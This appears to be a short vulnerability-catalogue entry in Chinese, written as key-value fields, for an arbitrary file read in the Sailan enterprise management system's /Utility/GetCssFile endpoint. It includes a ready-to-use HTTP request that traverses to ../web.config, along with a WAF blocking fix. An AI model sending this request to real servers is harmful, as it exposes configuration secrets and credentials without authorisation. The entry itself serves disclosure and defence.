vendor = "赛蓝"
name = "赛蓝企业管理系统 GetCssFile存在任意文件读取漏洞"
type = "任意文件读取"
version = "未知"
path = "/Utility/GetCssFile"
detail = "GET /Utility/GetCssFile?filePath=../web.config HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "1day"
